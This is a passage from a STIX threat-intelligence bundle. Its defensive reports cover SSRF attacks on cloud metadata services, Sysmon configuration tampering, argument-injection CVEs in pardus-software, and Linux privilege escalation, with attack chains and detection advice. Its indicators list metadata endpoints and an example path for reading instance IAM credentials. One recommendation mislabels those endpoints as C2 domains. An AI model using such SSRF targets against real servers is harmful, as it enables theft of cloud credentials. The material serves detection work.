      "target_ref": "indicator--58fcc205-0660-58e7-84ea-964aeb0b0348"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4e5660ff-10a0-5653-b3a5-811d0da8895b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: metadata.google.internal",
      "pattern": "[domain-name:value = 'metadata.google.internal']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:30:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e4bf52cf-c7fb-51e9-9d40-011cfad7e602",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "indicator--4e5660ff-10a0-5653-b3a5-811d0da8895b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--feecfa1a-5a95-544d-9431-b6feb2bcaa49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: metadata.goog",
      "pattern": "[domain-name:value = 'metadata.goog']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:30:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--699051b1-7c48-5078-92a7-3a2344980dcb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "indicator--feecfa1a-5a95-544d-9431-b6feb2bcaa49"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0e365dc7-69f9-5d1a-8cec-438d4bcd4562",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: ::ffff:169.254.169.254",
      "pattern": "[ipv4-addr:value = '::ffff:169.254.169.254']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:30:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7027a8d5-439a-5038-a901-99cd20a06380",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "indicator--0e365dc7-69f9-5d1a-8cec-438d4bcd4562"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4ae6bafc-6893-5faa-8c71-9ca41b4fecc0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: ::ffff:a9fe:a9fe",
      "pattern": "[ipv4-addr:value = '::ffff:a9fe:a9fe']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:30:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--68011b36-00ac-573c-b754-2eaa11128029",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "indicator--4ae6bafc-6893-5faa-8c71-9ca41b4fecc0"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1f2775e-b16c-5491-9cbe-30f9c7cffab3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--642098de-e7f7-59e2-a638-b8c2742efe7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2f4e95b9-0173-5c6b-a5a2-8d666946577e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Server Cloud Metadata SSRF Exploitation",
      "description": "## Overview\n\nThis threat involves the exploitation of Server-Side Request Forgery (SSRF) vulnerabilities found in web applications hosted on various platforms, including Nginx, Apache, IIS, and Traefik. Attackers leverage these vulnerabilities to manipulate web servers into making outbound requests to internal cloud instance metadata service (IMDS) endpoints. Such endpoints are typically associated with cloud providers like Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure, and are used to provision temporary credentials, tokens, and instance-specific information. The objective is to steal these credentials, enabling unauthorized access and control over cloud resources, which can lead to data exfiltration, resource manipulation, or further lateral movement within the cloud environment. This technique is a well-known method for escalating privileges in compromised cloud workloads.\n\n## Attack Chain\n\n1.  **Initial Access via SSRF Vulnerability**: An attacker identifies and exploits a Server-Side Request Forgery (SSRF) vulnerability within a public-facing web application, which could be running on Nginx, Apache, IIS, or Traefik.\n2.  **Internal Request Injection**: The attacker crafts a malicious HTTP request, embedding an internal cloud instance metadata service (IMDS) endpoint (e.g., `http://169.254.169.254/latest/meta-data/`) within a user-controlled URL or query parameter.\n3.  **Web Server Initiates Internal Connection**: The vulnerable web application processes the malicious request and, due to the SSRF flaw, makes an outbound HTTP connection to the specified internal IMDS endpoint as if it were a legitimate internal service request.\n4.  **Metadata Service Response**: The cloud instance metadata service responds to the web server's request, providing sensitive information such as temporary IAM role credentials (e.g., `meta-data/iam/security-credentials`), API tokens (e.g., `latest/api/token`), or instance configuration details.\n5.  **Credential Exfiltration**: The web application receives the sensitive metadata or credentials and, depending on the SSRF exploit, leaks this information back to the attacker as part of the HTTP response or through other channels.\n6.  **Cloud Resource Compromise**: The attacker uses the stolen temporary credentials to authenticate to the cloud provider's APIs (e.g., AWS CLI, GCP SDK), gaining unauthorized access to cloud resources, potentially leading to data exfiltration, privilege escalation, or further attacks.\n\n## Impact\n\nA successful SSRF attack against cloud instance metadata services can lead to significant compromise of cloud environments. Attackers can steal temporary credentials associated with the compromised workload, gaining unauthorized access to critical cloud resources, sensitive data, and the ability to manipulate cloud configurations. This can result in data breaches, resource hijacking, disruption of services, and the establishment of persistent access within the victim's cloud infrastructure. The breadth of potential impact depends on the permissions granted to the compromised instance's role or service account, which often include access to databases, object storage, and other core services.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Web Server Cloud Metadata SSRF Request\" to your SIEM to detect inbound HTTP requests containing cloud metadata endpoints.\n*   Block the C2 domains and IP addresses listed in the IOC table at the network perimeter (firewall/WAF) to prevent outbound connections to known metadata services from unauthorized sources.\n*   Implement strict outbound access controls and allowlisting at the network and application layer to restrict web applications from initiating connections to link-local addresses (e.g., 169.254.169.254) and other internal network ranges.\n*   Enforce the use of IMDSv2 (Instance Metadata Service Version 2) on AWS EC2 instances, and similar authenticated access mechanisms for other cloud providers, to require session tokens for metadata access.\n*   Regularly review and audit the permissions of cloud instance roles and managed identities, adhering to the principle of least privilege to minimize the impact of credential compromise.\n",
      "published": "2026-07-03T15:30:46Z",
      "labels": [
        "ssrf",
        "cloud-security",
        "web-exploitation",
        "credential-access",
        "initial-access",
        "webserver"
      ],
      "object_refs": [
        "indicator--708c4d53-451d-50e0-bafa-ed035d3178c6",
        "indicator--3cb49b86-9b9b-5303-bb0e-034f7f644599",
        "indicator--58fcc205-0660-58e7-84ea-964aeb0b0348",
        "indicator--4e5660ff-10a0-5653-b3a5-811d0da8895b",
        "indicator--feecfa1a-5a95-544d-9431-b6feb2bcaa49",
        "indicator--0e365dc7-69f9-5d1a-8cec-438d4bcd4562",
        "indicator--4ae6bafc-6893-5faa-8c71-9ca41b4fecc0",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://hackingthe.cloud/aws/general-knowledge/intro_metadata_service/"
        },
        {
          "source_name": "reference",
          "url": "https://owasp.org/www-community/attacks/Server_Side_Request_Forgery"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/credential_access_web_server_cloud_imds_ssrf_request.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--14a59c75-1a07-5bc2-8abc-b53eb9d43333",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Sysmon Configuration Updates for Defense Evasion",
      "description": "## Overview\n\nThis brief highlights a defense evasion technique involving the modification of Sysmon's configuration. Attackers, likely operating in the post-exploitation phase, may seek to update or replace a running Sysmon's configuration to limit its monitoring capabilities without completely stopping the service. By using the Sysmon executable (e.g., `Sysmon64.exe` or `Sysmon.exe`) with the `-c` command-line switch, adversaries can deploy a stripped-down configuration file that ignores critical process creations, network connections, or file modifications. This tactic allows them to operate with reduced visibility, avoiding detection mechanisms that rely on Sysmon telemetry. This technique is often seen in targeted attacks where adversaries aim to maintain persistence and execute malicious actions stealthily. The scope of targeting is broad, as Sysmon is a widely deployed endpoint monitoring solution across various environments.\n\n## Impact\n\nSuccessful implementation of this technique leads to a significant degradation of an organization's endpoint visibility and detection capabilities. By manipulating Sysmon's configuration, attackers can effectively blind security operations teams to their subsequent malicious activities, including privilege escalation, lateral movement, and data exfiltration. This impairment allows adversaries to operate undetected, potentially leading to prolonged dwell times and increased data compromise or system damage. While no specific victim count is available for this particular technique, its impact is severe across any sector relying on Sysmon for critical endpoint telemetry, making it a high-priority detection scenario for all Windows environments.\n\n## Recommendation\n\n* Deploy the Sigma rule \"Sysmon Configuration Update Detection\" provided in this brief to your SIEM and tune for your environment.\n* Ensure Sysmon is correctly installed and configured to log `process_creation` events, which are essential for the detection rule above.\n* Implement robust change management and integrity monitoring for Sysmon configuration files to detect unauthorized modifications.\n",
      "published": "2026-07-03T15:29:29Z",
      "labels": [
        "sysmon",
        "windows",
        "defense-evasion",
        "defense-impairment"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f4e75eb1-de61-536f-b399-f214b125cd12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14460: Missing Authorization and Argument Injection in TUBITAK BILGEM Pardus-Software",
      "description": "## Overview\n\nCVE-2026-14460 details a critical Missing Authorization vulnerability within pardus-software, developed by TUBITAK BILGEM Software Technologies Research Institute. This flaw affects all versions of pardus-software up to and including 1.0.4, and has been patched in version 1.0.5. The vulnerability specifically allows for \"Argument Injection\", meaning an attacker could manipulate input to inject arbitrary arguments into a system call or command, bypassing intended authorization checks. While specific exploitation details are not yet public, such injection flaws often lead to arbitrary command execution, privilege escalation, or data manipulation. This vulnerability has been assigned a CVSS v3.1 Base Score of 8.8 (High), highlighting its severe potential impact on systems running the affected software.\n\n## Impact\n\nThe Missing Authorization and Argument Injection vulnerability (CVE-2026-14460) in pardus-software has a significant impact potential. If exploited, an attacker could bypass intended security controls, inject malicious arguments into application processes, and potentially achieve arbitrary code execution or elevate privileges. This could lead to a complete compromise of the system's confidentiality (unauthorized data access), integrity (unauthorized data modification or system tampering), and availability (denial of service or system disruption). The high CVSS score reflects the serious consequences of successful exploitation for organizations utilizing the affected pardus-software.\n\n## Recommendation\n\n*   Immediately update TUBITAK BILGEM Software Technologies Research Institute pardus-software to version 1.0.5 or later to mitigate CVE-2026-14460.\n*   Review the official advisory from the Computer Emergency Response Team of the Republic of Turkey at `https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0497` for any further mitigation steps or security guidance.\n",
      "published": "2026-07-03T15:28:49Z",
      "labels": [
        "vulnerability",
        "CVE",
        "linux"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14460"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0497"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cc9b6999-dc00-5d0e-800e-572221fcf828",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://sploitus.com/exploit?id=42D2AB27-0085-5020-AA75-F3E233F72A3",
      "pattern": "[url:value = 'https://sploitus.com/exploit?id=42D2AB27-0085-5020-AA75-F3E233F72A3']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:28:00Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11fe2a8c-845f-5669-9c85-9441cbdc277e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b40dee7b-c946-5b11-8eee-15bfbf92b6a8",
      "target_ref": "indicator--cc9b6999-dc00-5d0e-800e-572221fcf828"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ebd3c84f-eb00-5cd2-be1a-83e861a19723",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "hash_sha256: 1d3f4c19affdb377ac5eee4c695619e9f6a4590350c3936678eb1db2cf601255",
      "pattern": "[file:hashes.'SHA-256' = '1d3f4c19affdb377ac5eee4c695619e9f6a4590350c3936678eb1db2cf601255']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:28:00Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd4a3341-2a1b-5f4c-8526-81ed5c0841a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b40dee7b-c946-5b11-8eee-15bfbf92b6a8",
      "target_ref": "indicator--ebd3c84f-eb00-5cd2-be1a-83e861a19723"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd5e29de-1088-5507-ba64-4386cc71cc04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b40dee7b-c946-5b11-8eee-15bfbf92b6a8",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b40dee7b-c946-5b11-8eee-15bfbf92b6a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14459: Argument Injection Vulnerability in TUBITAK BILGEM pardus-software",
      "description": "## Overview\n\nCVE-2026-14459 details an improper neutralization of argument delimiters (argument injection) vulnerability within the TUBITAK BILGEM Software Technologies Research Institute's `pardus-software`. This critical flaw affects versions equal to or less than 1.0.4, with the patched version being 1.0.5. The vulnerability, which carries a CVSS v3.1 base score of 8.8 (High), allows a local attacker with low privileges to manipulate command arguments. By exploiting this weakness, an attacker can inject arbitrary commands, leading to unauthorized code execution and significant impact on the affected system's confidentiality, integrity, and availability. This vulnerability poses a serious risk to systems running the vulnerable software, as it can be leveraged for privilege escalation or to execute malicious payloads from an already compromised local environment.\n\n## Attack Chain\n\n1.  **Initial Access**: The attacker gains low-privileged local access to a system running a vulnerable version of `pardus-software`. This could be through a user account or another prior compromise (CVSS AV:L, PR:L).\n2.  **Vulnerability Discovery**: The attacker identifies the presence of `pardus-software` and confirms its version is vulnerable to CVE-2026-14459.\n3.  **Malicious Input Crafting**: The attacker crafts a specific input containing specially formatted argument delimiters and commands designed to exploit the argument injection vulnerability.\n4.  **Exploitation**: The attacker submits the crafted malicious input to `pardus-software` via a user interface, API, or command-line interaction that processes arguments without proper sanitization.\n5.  **Argument Injection**: The `pardus-software` improperly interprets the attacker's input, leading to the injection of unintended arguments into an underlying command execution function.\n6.  **Arbitrary Command Execution**: The injected arguments result in the execution of an attacker-controlled command with the privileges of the `pardus-software` process.\n7.  **Impact**: The attacker's command executes, potentially leading to privilege escalation, arbitrary code execution, system compromise, or data manipulation and exfiltration.\n\n## Impact\n\nThe exploitation of CVE-2026-14459 results in a high impact on the confidentiality, integrity, and availability of the affected system, as indicated by its CVSS v3.1 score of 8.8 (C:H/I:H/A:H). Successful exploitation allows an attacker to execute arbitrary commands, which can lead to complete system compromise, data theft, data corruption, or denial-of-service conditions. This vulnerability provides a pathway for a low-privileged local attacker to elevate their privileges or execute malicious payloads without further authentication, posing a significant risk to the overall security posture of environments running `pardus-software`.\n\n## Recommendation\n\n*   Immediately patch `pardus-software` to version 1.0.5 or later to mitigate CVE-2026-14459.\n*   Restrict execution permissions for `pardus-software` to only necessary users and contexts to limit the impact of potential local exploitation.\n",
      "published": "2026-07-03T15:28:00Z",
      "labels": [
        "vulnerability",
        "argument-injection",
        "linux",
        "cve"
      ],
      "object_refs": [
        "indicator--cc9b6999-dc00-5d0e-800e-572221fcf828",
        "indicator--ebd3c84f-eb00-5cd2-be1a-83e861a19723",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14459"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0497"
        },
        {
          "source_name": "reference",
          "url": "https://sploitus.com/exploit?id=42D2AB27-0085-5020-AA75-F3E233F792A3\u0026utm_source=rss\u0026utm_medium=rss"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28bc1f2d-a5ec-5fc1-b8d9-1846edf3aaff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--24541d59-c3a9-5575-8838-0b0e1bdb9834",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--24541d59-c3a9-5575-8838-0b0e1bdb9834",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Linux Privilege Escalation via Parent/Child UID Change",
      "description": "## Overview\n\nThis brief describes a critical Linux privilege escalation technique identified by Elastic, focusing on the sequence of events indicative of an attacker gaining root privileges. It involves a non-root user executing a binary from a user- or world-writable location (e.g., `/tmp`, `/var/tmp`, `/home/*`), which then spawns a child process that successfully changes its effective user ID to 0 (root). This methodology bypasses standard security controls and is often seen in local privilege escalation exploits. While specific campaigns are not detailed, this technique is a common post-exploitation step for various threat actors aiming for full system control and persistence on compromised Linux systems, allowing for further malicious activities like data exfiltration or deploying additional malware.\n\n## Attack Chain\n\n1.  Attacker establishes initial access to a Linux system as a non-root user.\n2.  Attacker stages a local privilege escalation (LPE) exploit binary or script in a user- or world-writable directory, such as `/tmp`, `/var/tmp`, or a user's home directory.\n3.  The non-root attacker executes the staged exploit from the writable directory.\n4.  The executed exploit (parent process) initiates a child process designed to elevate privileges.\n5.  The child process successfully changes its effective user ID to 0 (root), indicating a successful privilege escalation.\n6.  The attacker gains full root-level control over the compromised Linux system, allowing for arbitrary command execution and system modification.\n\n## Impact\n\nA successful privilege escalation to root on a Linux system grants the attacker complete control over the compromised host. This enables arbitrary code execution, installation of persistent backdoors, modification of system configurations, access to sensitive data, and the ability to pivot to other systems within the network. The attacker can evade detection, destroy evidence, or use the system as a launchpad for further attacks. If critical infrastructure or sensitive data stores are targeted, the impact can include severe data breaches, service disruption, and significant financial and reputational damage to the organization. The advisory does not specify observed victim counts or sectors, but successful root access is universally critical.\n\n## Recommendation\n\n*   Enable `process_creation` and `uid_change` logging on all Linux endpoints, ideally using an EDR solution like Elastic Defend, to detect the sequence of non-root execution followed by UID change to root as described in this brief.\n*   Monitor for process execution from world-writable directories such as `/tmp`, `/dev/shm`, `/var/tmp`, `/run/user`, or `/home/*/*`, as highlighted by the `process.executable` and `process.parent.executable` fields in the EQL query.\n*   Investigate immediately any `event.action == \"uid_change\"` where `user.id == \"0\"` by a child process whose parent executed from an unprivileged location, especially if the process is not a known administrative tool like `/usr/bin/sudo` or `/bin/sudo`.\n*   Regularly review file ownership, permissions, and timestamps for executables found in user- or world-writable directories to identify suspicious binaries that might be LPE exploits.\n*   Ensure that systems are regularly patched, particularly for kernel and userland packages, to mitigate known local privilege escalation vulnerabilities.\n",
      "published": "2026-07-03T15:21:18Z",
      "labels": [
        "privilege-escalation",
        "linux",
        "endpoint",
        "post-exploitation"
      ],
      "object_refs": [
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_potential_privesc_via_general_sequence_parent_child.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1bfdef89-babb-567c-96c0-c73a2c884fef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f57d9274-5504-5069-aed3-a0ccf282934d",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f57d9274-5504-5069-aed3-a0ccf282934d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Linux Privilege Escalation via Parent Process Sequence",
      "description": "## Overview\n\nThis threat focuses on a common technique used by attackers to gain root privileges on compromised Linux systems, often after achieving initial access with a low-privileged user. The core behavior involves an unprivileged process launching an executable from a suspicious, user- or world-writable location (e.g., `/tmp`, `/var/tmp`, user home directories). Shortly after execution, this process or a direct child process of its lineage performs a User ID (UID) change to `0` (root), without using legitimate elevation mechanisms like `sudo`. This sequence is a strong indicator of a successful local privilege escalation exploit, where an attacker has likely dropped or compiled a custom exploit binary and executed it to leverage a kernel vulnerability or misconfiguration. The immediate impact is full control over the compromised host, enabling further malicious activities like data exfiltration, lateral movement, or installing persistent backdoors.\n\n## Attack Chain\n\n1.  **Initial Compromise**: Attacker gains initial access to a Linux system, typically as a low-privileged user (e.g., via a web application vulnerability, compromised credentials, or phishing).\n2.  **Exploit Delivery**: The attacker uploads or compiles a local privilege escalation (LPE) exploit binary or script onto the compromised system.\n3.  **Exploit Staging**: The exploit is placed in a user- or world-writable directory such as `/tmp`, `/var/tmp`, `/dev/shm`, or a user's home directory (`/home/username/`).\n4.  **Initial Execution**: The attacker executes the staged exploit binary or script as the currently logged-in non-root user.\n5.  **Privilege Escalation**: The exploit successfully leverages a vulnerability (e.g., kernel bug, misconfigured SUID binary) to change the effective User ID (UID) of its process to `0` (root).\n6.  **Root Shell/Post-Exploitation**: The now-privileged process (running as root) typically spawns a root shell, adds persistent access, modifies system configurations, or prepares for lateral movement.\n7.  **Impactful Action**: With root privileges, the attacker proceeds to achieve their objective, such as exfiltrating sensitive data, deploying ransomware, or establishing a command and control (C2) channel.\n\n## Impact\n\nA successful local privilege escalation (LPE) grants attackers complete control over the compromised Linux host. This immediately opens the door to a wide range of destructive and covert activities. Attackers can read, modify, or delete any file on the system, including sensitive configuration files, user data, and system logs. They can install new software, create persistent backdoors (e.g., modifying `sudoers`, adding SSH keys, creating new systemd services), disable security software, and manipulate authentication mechanisms. The primary risk is often data exfiltration, followed by lateral movement to other systems within the network using the newly gained privileged access or stolen credentials. Uncontrolled LPE can lead to complete network compromise and significant financial and reputational damage.\n\n## Recommendation\n\n*   Deploy the Sigma rule in this brief to your SIEM and tune for your environment.\n*   Ensure `process_creation` logging is enabled on all Linux endpoints to capture `User`, `ParentUser`, `Image`, and `ParentImage` fields as needed by the Sigma rule.\n*   Restrict write permissions on critical system directories and mount temporary file systems like `/tmp` and `/var/tmp` with `noexec,nosuid,nodev` where feasible, to prevent execution of arbitrary binaries.\n*   Regularly audit and remove unnecessary SUID/SGID binaries and Linux capabilities using tools like `find / -perm /6000` and `getcap -r /`.\n*   Implement strong integrity monitoring for critical system files and executables to detect unauthorized modifications.\n",
      "published": "2026-07-03T15:20:07Z",
      "labels": [
        "linux",
        "privilege-escalation",
        "local-privilege-escalation",
        "endpoint",
        "threat-detection"
      ],
      "object_refs": [
        "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_potential_privesc_via_general_sequence_parent.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d6558f19-8156-5069-b94e-ad966044cd67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--26ad0ee9-6cd4-5c7c-a3e3-621517faa320",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--26ad0ee9-6cd4-5c7c-a3e3-621517faa320",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Linux Privilege Escalation via Suspicious UID Change",
      "description": "## Overview\n\nThis threat involves a sophisticated local privilege escalation (LPE) technique on Linux systems. Attackers, after gaining an initial foothold as a non-privileged user, deploy a malicious executable or script into commonly user- or world-writable directories such as `/tmp`, `/dev/shm`, `/var/tmp`, or a user's home directory (`/home/`). This staged binary is then executed with the non-root user's permissions. The core of the attack lies in the binary's ability to exploit a vulnerability—often a misconfigured or vulnerable setuid binary, a kernel flaw, or similar privilege escalation vector—to force a change in its own effective user ID (UID) to 0 (root) during runtime. This suspicious UID change from a non-root user to root, originating from an untrusted path, is a strong indicator of a successful LPE attempt, granting the attacker full control over the compromised Linux host.\n\n## Attack Chain\n\n1.  Attacker gains initial access and establishes a foothold on a Linux system as a non-root user.\n2.  A malicious executable or script (e.g., an LPE exploit, a wrapper) is deployed by the attacker into a user- or world-writable directory such as `/tmp`, `/dev/shm`, or `/var/tmp`.\n3.  The attacker executes this deployed binary or script using their currently compromised non-root user privileges.\n4.  The executed binary leverages an existing local vulnerability, such as a flawed setuid binary, a kernel exploit, or a misconfiguration.\n5.  As a result of the exploitation, the running process successfully changes its effective user ID (UID) to 0, granting it root privileges.\n6.  The attacker now operates with full system control, enabling further actions like persistence establishment, data exfiltration, or lateral movement.\n\n## Impact\n\nSuccessful exploitation of this privilege escalation technique grants attackers full root privileges on the compromised Linux system. This allows them to bypass security controls, install backdoors, modify system configurations (e.g., `/etc/shadow`, `/etc/sudoers`), create new privileged accounts, access sensitive data across the entire system, and potentially establish persistent access. The impact can range from data theft and system manipulation to the use of the compromised host as a staging ground for further attacks within the network. The observed pattern of execution from temporary or 